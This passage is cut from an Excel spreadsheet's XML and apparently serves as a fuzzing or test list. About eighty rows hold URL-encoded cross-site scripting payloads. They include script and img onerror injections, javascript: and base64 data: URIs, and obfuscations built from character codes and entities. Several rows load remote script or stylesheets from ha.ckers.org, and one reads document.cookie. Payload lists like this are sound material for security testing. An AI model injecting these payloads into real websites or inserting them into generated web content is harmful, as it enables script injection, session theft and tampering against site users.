        <v>%3E%3Cimg%20src%3Dx%20onerror%3Dwindow.open%28%27https%3A%2F%2Fwww.google.com%2F%27%29%3B%3E%3Cform%3E%3Cbutton%20formaction%3Djavascript%26colon%3Balert%281%29%3ECLICKME%3Cmath%3E%3Ca%20xlink%3Ahref%3D%2F%2Fjsfiddle.net%2Ft846h%2F%22%3Eclick</v>
      </c>
    </row>
    <row r="757">
      <c r="A757" s="3" t="s">
        <v>649</v>
      </c>
      <c r="B757" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20data%3Ddata%3Atext%2Fhtml%3Bbase64%2CPHN2Zy9vbmxvYWQ9YWxlcnQoMik%2B%3E%3C%2Fobject%3E</v>
      </c>
    </row>
    <row r="758">
      <c r="A758" s="3" t="s">
        <v>650</v>
      </c>
      <c r="B758" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3D%22data%3Atext%2Fhtml%2C%253C%2573%2563%2572%2569%2570%2574%253E%2561%256C%2565%2572%2574%2528%2531%2529%253C%252F%2573%2563%2572%2569%2570%2574%253E%22%3E%3C%2Fiframe%3E</v>
      </c>
    </row>
    <row r="759">
      <c r="A759" s="3" t="s">
        <v>651</v>
      </c>
      <c r="B759" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22data%3Atext%2Fhtml%3Bblabla%2C%26%2360%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2332%26%23115%26%23114%26%2399%26%2361%26%2334%26%23104%26%23116%26%23116%26%23112%26%2358%26%2347%26%2347%26%23115%26%23116%26%23101%26%23114%26%23110%26%23101%26%23102%26%2397%26%23109%26%23105%26%23108%26%23121%26%2346%26%23110%26%23101%26%23116%26%2347%26%23102%26%23111%26%23111%26%2346%26%23106%26%23115%26%2334%26%2362%26%2360%26%2347%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2362%26%238203%22%3EClick%20Me%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="760">
      <c r="A760" s="3" t="s">
        <v>662</v>
      </c>
      <c r="B760" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%3EString.fromCharCode%2897%2C%20108%2C%20101%2C%20114%2C%20116%2C%2040%2C%2049%2C%2041%29%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="761">
      <c r="A761" s="3" t="s">
        <v>663</v>
      </c>
      <c r="B761" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%E2%80%98%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%E2%80%99%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%E2%80%9D%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%E2%80%9D%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%E2%80%93%3E%3C%2FSCRIPT%3E%E2%80%9D%3E%E2%80%99%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="762">
      <c r="A762" s="3" t="s">
        <v>664</v>
      </c>
      <c r="B762" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20%E2%80%9C%E2%80%9D%E2%80%9D%3E%3CSCRIPT%3Ealert%28%E2%80%9CXSS%E2%80%9D%29%3C%2FSCRIPT%3E%E2%80%9D%3E</v>
      </c>
    </row>
    <row r="763">
      <c r="A763" s="3" t="s">
        <v>472</v>
      </c>
      <c r="B763" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E</v>
      </c>
    </row>
    <row r="764">
      <c r="A764" s="3" t="s">
        <v>665</v>
      </c>
      <c r="B764" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%E2%80%9Djav%20ascript%3Aalert%28%E2%80%98XSS%E2%80%99%29%3B%E2%80%9D%3E</v>
      </c>
    </row>
    <row r="765">
      <c r="A765" s="3" t="s">
        <v>666</v>
      </c>
      <c r="B765" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%E2%80%9Djav%26%23x09%3Bascript%3Aalert%28%E2%80%98XSS%E2%80%99%29%3B%E2%80%9D%3E</v>
      </c>
    </row>
    <row r="766">
      <c r="A766" s="3" t="s">
        <v>667</v>
      </c>
      <c r="B766" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3CSCRIPT%3Ealert%28%E2%80%9CXSS%E2%80%9D%29%3B%2F%2F%3C%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="767">
      <c r="A767" s="3" t="s">
        <v>668</v>
      </c>
      <c r="B767" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%25253cscript%25253ealert%281%29%25253c%2Fscript%25253e</v>
      </c>
    </row>
    <row r="768">
      <c r="A768" s="3" t="s">
        <v>669</v>
      </c>
      <c r="B768" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%E2%80%9C%3E%3Cs%E2%80%9D%252b%E2%80%9Dcript%3Ealert%28document.cookie%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="769">
      <c r="A769" s="3" t="s">
        <v>670</v>
      </c>
      <c r="B769" s="4" t="str">
        <f t="shared" si="1"/>
        <v>foo%3Cscript%3Ealert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="770">
      <c r="A770" s="3" t="s">
        <v>671</v>
      </c>
      <c r="B770" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscr%3Cscript%3Eipt%3Ealert%281%29%3C%2Fscr%3C%2Fscript%3Eipt%3E</v>
      </c>
    </row>
    <row r="771">
      <c r="A771" s="3" t="s">
        <v>476</v>
      </c>
      <c r="B771" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2339%3B%26%2388%3B%26%2383%3B%26%2383%3B%26%2339%3B%26%2341%3B%3E</v>
      </c>
    </row>
    <row r="772">
      <c r="A772" s="3" t="s">
        <v>477</v>
      </c>
      <c r="B772" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041%3E</v>
      </c>
    </row>
    <row r="773">
      <c r="A773" s="3" t="s">
        <v>478</v>
      </c>
      <c r="B773" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E</v>
      </c>
    </row>
    <row r="774">
      <c r="A774" s="3" t="s">
        <v>672</v>
      </c>
      <c r="B774" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20BACKGROUND%3D%E2%80%9Djavascript%3Aalert%28%E2%80%98XSS%E2%80%99%29%E2%80%9D%3E</v>
      </c>
    </row>
    <row r="775">
      <c r="A775" s="3" t="s">
        <v>673</v>
      </c>
      <c r="B775" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20ONLOAD%3Dalert%28%E2%80%98XSS%E2%80%99%29%3E</v>
      </c>
    </row>
    <row r="776">
      <c r="A776" s="3" t="s">
        <v>674</v>
      </c>
      <c r="B776" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CINPUT%20TYPE%3D%E2%80%9DIMAGE%E2%80%9D%20SRC%3D%E2%80%9Djavascript%3Aalert%28%E2%80%98XSS%E2%80%99%29%3B%E2%80%9D%3E</v>
      </c>
    </row>
    <row r="777">
      <c r="A777" s="3" t="s">
        <v>675</v>
      </c>
      <c r="B777" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%E2%80%9Djavascript%3Aalert%28%E2%80%98XSS%E2%80%99%29%E2%80%9D</v>
      </c>
    </row>
    <row r="778">
      <c r="A778" s="3" t="s">
        <v>492</v>
      </c>
      <c r="B778" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html%20%3C</v>
      </c>
    </row>
    <row r="779">
      <c r="A779" s="3" t="s">
        <v>676</v>
      </c>
      <c r="B779" s="4" t="str">
        <f t="shared" si="1"/>
        <v>javascript%3Aalert%28%22hellox%20worldss%22%29</v>
      </c>
    </row>
    <row r="780">
      <c r="A780" s="3" t="s">
        <v>677</v>
      </c>
      <c r="B780" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="781">
      <c r="A781" s="3" t="s">
        <v>678</v>
      </c>
      <c r="B781" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Djavascript%3Aalert%28%26quot%3BXSS%26quot%3B%29%3E</v>
      </c>
    </row>
    <row r="782">
      <c r="A782" s="3" t="s">
        <v>679</v>
      </c>
      <c r="B782" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%22%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="783">
      <c r="A783" s="3" t="s">
        <v>680</v>
      </c>
      <c r="B783" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22refresh%22%20CONTENT%3D%220%3Burl%3Ddata%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3E</v>
      </c>
    </row>
    <row r="784">
      <c r="A784" s="3" t="s">
        <v>522</v>
      </c>
      <c r="B784" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E%3C%2FIFRAME%3E</v>
      </c>
    </row>
    <row r="785">
      <c r="A785" s="3" t="s">
        <v>533</v>
      </c>
      <c r="B785" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CEMBED%20SRC%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH%20A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv%20MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs%20aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw%20IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh%20TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22%20type%3D%22image%2Fsvg%2Bxml%22%20AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E</v>
      </c>
    </row>
    <row r="786">
      <c r="A786" s="3" t="s">
        <v>541</v>
      </c>
      <c r="B786" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20a%3D%22%3E%22%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="787">
      <c r="A787" s="3" t="s">
        <v>543</v>
      </c>
      <c r="B787" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20a%3D%22%3E%22%20%27%27%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="788">
      <c r="A788" s="3" t="s">
        <v>544</v>
      </c>
      <c r="B788" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20%22a%3D%27%3E%27%22%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="789">
      <c r="A789" s="3" t="s">
        <v>546</v>
      </c>
      <c r="B789" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20a%3D%22%3E%27%3E%22%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="790">
      <c r="A790" s="3" t="s">
        <v>547</v>
      </c>
      <c r="B790" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="791">
      <c r="A791" s="3" t="s">
        <v>488</v>
      </c>
      <c r="B791" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="792">
      <c r="A792" s="3" t="s">
        <v>679</v>
      </c>
      <c r="B792" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%22%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="793">
      <c r="A793" s="5" t="s">
        <v>681</v>
      </c>
      <c r="B793" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%3F%2FSCRIPT%3E%26submit.x%3D27%26submit.y%3D9%26cmd%3Dsearch</v>
      </c>
    </row>
    <row r="794">
      <c r="A794" s="3" t="s">
        <v>682</v>
      </c>
      <c r="B794" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ealert%28%22hellox%20worldss%22%29%3C%2Fscript%3E%26safe%3Dhigh%26cx%3D006665157904466893121%3Asu_tzknyxug%26cof%3DFORID%3A9%23510</v>
      </c>
    </row>
    <row r="795">
      <c r="A795" s="3" t="s">
        <v>683</v>
      </c>
      <c r="B795" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E%26search%3D1</v>
      </c>
    </row>
    <row r="796">
      <c r="A796" s="3" t="s">
        <v>684</v>
      </c>
      <c r="B796" s="4" t="str">
        <f t="shared" si="1"/>
        <v>0%26q%3D%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%252%3F8String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%3F%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%25%3F29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%25%3F2C83%29%29%3C%2FSCRIPT%3E%26submit-frmGoogleWeb%3DWeb%2BSearch</v>
      </c>
    </row>
    <row r="797">
      <c r="A797" s="3" t="s">
        <v>685</v>
      </c>
      <c r="B797" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ch1%3E%3Cfont%20color%3Dblue%3Ehellox%20worldss%3C%2Fh1%3E</v>
      </c>
    </row>
    <row r="798">
      <c r="A798" s="3" t="s">
        <v>686</v>
      </c>
      <c r="B798" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20ONLOAD%3Dalert%28%27hellox%20worldss%27%29%3E</v>
      </c>
    </row>
    <row r="799">
      <c r="A799" s="3" t="s">
        <v>687</v>
      </c>
      <c r="B799" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%20onfocus%3Dwrite%28XSS%29%20autofocus%3E</v>
      </c>
    </row>
    <row r="800">
      <c r="A800" s="3" t="s">
        <v>688</v>
      </c>
      <c r="B800" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%20onblur%3Dwrite%28XSS%29%20autofocus%3E%3Cinput%20autofocus%3E</v>
      </c>
    </row>
    <row r="801">
      <c r="A801" s="3" t="s">
        <v>689</v>
      </c>
      <c r="B801" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onscroll%3Dalert%28XSS%29%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E...%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cinput%20autofocus%3E</v>
      </c>
    </row>
    <row r="802">
      <c r="A802" s="3" t="s">
        <v>690</v>
      </c>
      <c r="B802" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Cbutton%20formaction%3D%22javascript%3Aalert%28XSS%29%22%3Elol</v>
      </c>
    </row>
    <row r="803">
      <c r="A803" s="3" t="s">
        <v>691</v>
      </c>
      <c r="B803" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%3Cimg%20src%3D%22--%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28XSS%29%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="804">
      <c r="A804" s="3" t="s">
        <v>692</v>
      </c>
      <c r="B804" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21%5B%3E%3Cimg%20src%3D%22%5D%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28XSS%29%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="805">
      <c r="A805" s="3" t="s">
        <v>693</v>
      </c>
      <c r="B805" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%3Cimg%20src%3D%22%3C%2Fstyle%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28XSS%29%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="806">
      <c r="A806" s="3" t="s">
        <v>694</v>
      </c>
      <c r="B806" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3F%20foo%3D%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3E</v>
      </c>
    </row>
    <row r="807">
      <c r="A807" s="3" t="s">
        <v>695</v>
      </c>
      <c r="B807" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21%20foo%3D%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3E</v>
      </c>
    </row>
    <row r="808">
      <c r="A808" s="3" t="s">
        <v>696</v>
      </c>
      <c r="B808" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2F%20foo%3D%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3E</v>
      </c>
    </row>
    <row r="809">
      <c r="A809" s="3" t="s">
        <v>697</v>
      </c>
      <c r="B809" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3F%20foo%3D%22%3E%3Cx%20foo%3D%27%3F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%27%3E%22%3E</v>
      </c>
    </row>
    <row r="810">
      <c r="A810" s="3" t="s">
        <v>698</v>
      </c>
      <c r="B810" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21%20foo%3D%22%5B%5B%5BInception%5D%5D%22%3E%3Cx%20foo%3D%22%5Dfoo%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3E</v>
      </c>
    </row>
    <row r="811">
      <c r="A811" s="3" t="s">
        <v>699</v>
      </c>
      <c r="B811" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%25%20foo%3E%3Cx%20foo%3D%22%25%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E%22%3E</v>
      </c>
    </row>
    <row r="812">
      <c r="A812" s="3" t="s">
        <v>700</v>
      </c>
      <c r="B812" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22font-family%3A%27foo%26%2310%3B%3Bcolor%3Ared%3B%27%3B%22%3ELOL</v>
      </c>
    </row>
    <row r="813">
      <c r="A813" s="3" t="s">
        <v>701</v>
      </c>
      <c r="B813" s="4" t="str">
        <f t="shared" si="1"/>
        <v>LOL%3Cstyle%3E%2A%7B%2F%2Aall%2A%2Fcolor%2F%2Aall%2A%2F%3A%2F%2Aall%2A%2Fred%2F%2Aall%2A%2F%3B%2F%5B0%5D%2AIE%2CSafari%2A%5B0%5D%2Fcolor%3Agreen%3Bcolor%3Abl%2F%2AIE%2A%2Fue%3B%7D%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="814">
      <c r="A814" s="3" t="s">
        <v>702</v>
      </c>
      <c r="B814" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%28%7B0%3A%230%3Dalert%2F%230%23%2F%230%23%280%29%7D%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="815">
      <c r="A815" s="3" t="s">
        <v>703</v>
      </c>
      <c r="B815" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3ELOL%3Cscript%3Ealert%28123%29%3C%2Fscript%3E%3C%2Fsvg%3E</v>
      </c>
    </row>
    <row r="816">
      <c r="A816" s="3" t="s">
        <v>704</v>
      </c>
      <c r="B816" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%26gt%3Balert%28%2FXSS%2F%26%2346%3Bsource%29%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="817">
      <c r="A817" s="3" t="s">
        <v>705</v>
      </c>
      <c r="B817" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5C%5C%22%3Balert%28%27XSS%27%29%3B%2F%2F</v>
      </c>
    </row>
    <row r="818">
      <c r="A818" s="3" t="s">
        <v>706</v>
      </c>
      <c r="B818" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3B%2FTITLE%26gt%3B%26lt%3BSCRIPT%26gt%3Balert%28%5C%22XSS%5C%22%29%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="819">
      <c r="A819" s="3" t="s">
        <v>707</v>
      </c>
      <c r="B819" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BINPUT%20TYPE%3D%5C%22IMAGE%5C%22%20SRC%3D%5C%22javascript%26%23058%3Balert%28%27XSS%27%29%3B%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="820">
      <c r="A820" s="3" t="s">
        <v>708</v>
      </c>
      <c r="B820" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BBODY%20BACKGROUND%3D%5C%22javascript%26%23058%3Balert%28%27XSS%27%29%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="821">
      <c r="A821" s="3" t="s">
        <v>709</v>
      </c>
      <c r="B821" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BBODY%20ONLOAD%3Dalert%28%27XSS%27%29%26gt%3B</v>
      </c>
    </row>
    <row r="822">
      <c r="A822" s="3" t="s">
        <v>710</v>
      </c>
      <c r="B822" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20DYNSRC%3D%5C%22javascript%26%23058%3Balert%28%27XSS%27%29%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="823">
      <c r="A823" s="3" t="s">
        <v>711</v>
      </c>
      <c r="B823" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20LOWSRC%3D%5C%22javascript%26%23058%3Balert%28%27XSS%27%29%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="824">
      <c r="A824" s="3" t="s">
        <v>712</v>
      </c>
      <c r="B824" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BBGSOUND%20SRC%3D%5C%22javascript%26%23058%3Balert%28%27XSS%27%29%3B%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="825">
      <c r="A825" s="3" t="s">
        <v>713</v>
      </c>
      <c r="B825" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BBR%20SIZE%3D%5C%22%26%7Balert%28%27XSS%27%29%7D%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="826">
      <c r="A826" s="3" t="s">
        <v>714</v>
      </c>
      <c r="B826" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BLAYER%20SRC%3D%5C%22http%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fscriptlet%26%2346%3Bhtml%5C%22%26gt%3B%26lt%3B%2FLAYER%26gt%3B</v>
      </c>
    </row>
    <row r="827">
      <c r="A827" s="3" t="s">
        <v>715</v>
      </c>
      <c r="B827" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BLINK%20REL%3D%5C%22stylesheet%5C%22%20HREF%3D%5C%22javascript%26%23058%3Balert%28%27XSS%27%29%3B%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="828">
      <c r="A828" s="3" t="s">
        <v>716</v>
      </c>
      <c r="B828" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BLINK%20REL%3D%5C%22stylesheet%5C%22%20HREF%3D%5C%22http%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fxss%26%2346%3Bcss%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="829">
      <c r="A829" s="3" t="s">
        <v>717</v>
      </c>
      <c r="B829" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSTYLE%26gt%3B%40import%27http%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fxss%26%2346%3Bcss%27%3B%26lt%3B%2FSTYLE%26gt%3B</v>
      </c>
    </row>
    <row r="830">
      <c r="A830" s="3" t="s">
        <v>718</v>
      </c>
      <c r="B830" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BMETA%20HTTP-EQUIV%3D%5C%22Link%5C%22%20Content%3D%5C%22%26lt%3Bhttp%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fxss%26%2346%3Bcss%26gt%3B%3B%20REL%3Dstylesheet%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="831">
      <c r="A831" s="3" t="s">
        <v>719</v>
      </c>
      <c r="B831" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSTYLE%26gt%3BBODY%7B-moz-binding%26%2358%3Burl%28%5C%22http%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fxssmoz%26%2346%3Bxml%23xss%5C%22%29%7D%26lt%3B%2FSTYLE%26gt%3B</v>
      </c>
    </row>
    <row r="832">
      <c r="A832" s="3" t="s">
        <v>720</v>
      </c>
      <c r="B832" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BXSS%20STYLE%3D%5C%22behavior%26%2358%3B%20url%28xss%26%2346%3Bhtc%29%3B%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="833">
      <c r="A833" s="3" t="s">
        <v>721</v>
      </c>
      <c r="B833" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSTYLE%26gt%3Bli%20%7Blist-style-image%26%2358%3B%20url%28%5C%22javascript%26%23058%3Balert%28%27XSS%27%29%5C%22%29%3B%7D%26lt%3B%2FSTYLE%26gt%3B%26lt%3BUL%26gt%3B%26lt%3BLI%26gt%3BXSS</v>
      </c>
    </row>
    <row r="834">
      <c r="A834" s="3" t="s">
        <v>722</v>
      </c>
      <c r="B834" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%27vbscript%26%23058%3Bmsgbox%28%5C%22XSS%5C%22%29%27%26gt%3B</v>
      </c>
    </row>
    <row r="835">
      <c r="A835" s="3" t="s">
        <v>723</v>
      </c>
      <c r="B835" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%5C%22mocha%26%2358%3B%26%2391%3Bcode%26%2393%3B%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="836">
      <c r="A836" s="3" t="s">
        <v>724</v>
      </c>
